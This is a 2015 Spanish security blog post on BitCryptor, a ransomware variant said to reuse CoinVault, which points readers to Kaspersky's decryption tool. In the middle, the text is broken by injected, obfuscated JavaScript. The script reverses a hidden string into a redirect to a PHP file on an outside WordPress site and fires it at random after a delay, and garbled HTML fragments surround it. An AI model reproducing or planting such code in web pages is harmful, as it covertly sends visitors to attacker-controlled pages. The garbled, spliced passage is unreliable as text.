NUEVA VARIANTE DE RANSOMWARE BITCRYPTOR , DERIVADO DEL COINVAULT
De nuevo nos encontramos con una de las amenazas que más presencia posee en Internet y que su finalidad es el cifrado de los archivos. Estamos hablando de CoinVault y sus propietarios han lanzado una nueva pieza malware bajo el nombre de BitCryptor. Lejos de ser una nueva amenaza, todo parece indicar que se trata de una reutilización de la primera.
Los expertos en seguridad se basan en que las vías de infección son idénticas a la primera y los efectos sobre los archivos y el modo de actuar una vez ha alcanzado el equipo son prácticamente idénticos. Hasta tal punto se puede decir que se trata de una copia con distinto nombre que la herramienta que había puesto Kaspersky para descifrar los archivos afectados por Coin Vault también funciona de forma correcta con esta.
Hay que recordar que esta aplicación de descifrado se creó después de que las autoridades holandesas consiguiesen el control de uno de los servidores encargados de controlar y distribuir el troyano.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tor-655×427.jpg?x=634″ alt=”” width=”634″ height=”413″ /></p>
<p>http://46qasb3uw5yn639ko4bz2ptr8u.wpengine.netdna-cdn.com/files/2015/04/convault-decryption-1.jpg</p>
<p>¿Qué archivos se pueden ver afectados por BitCryp<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
tor?
Tal vez la única diferencia con respecto al primero es que el cifrado de archivos es bastante más selectivo, centrándose sobre todo en aquellos que desempeñan una función importante en los sistemas operativos Windows, como por ejemplo la carpeta Archivos de Programa, Papelera de Reciclaje, WinNT, Usuarios, Descargas, …
Esto implica dos cosas: la primera es que los ciberdelincuentes buscan el cifrado de archivos importantes que el usuario puede tener en un equipo e inutilizar la mayor cantidad de programas, evitando que el funcionamiento del equipo sea normal.
Ver informacion original al respecto en Fuente:
NOTA IMPORTANTE:
Recordemos para quienes puedan infectarse, información sobre la utilidad para el descifrado de ficheros codificados por CoinVault ofrecida por Kaspersky. Ver informacion al respecto en :
https://blog.kaspersky.es/coinvault-ransomware-removal-instruction/5789/
saludos
ms, 19-5-2015
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.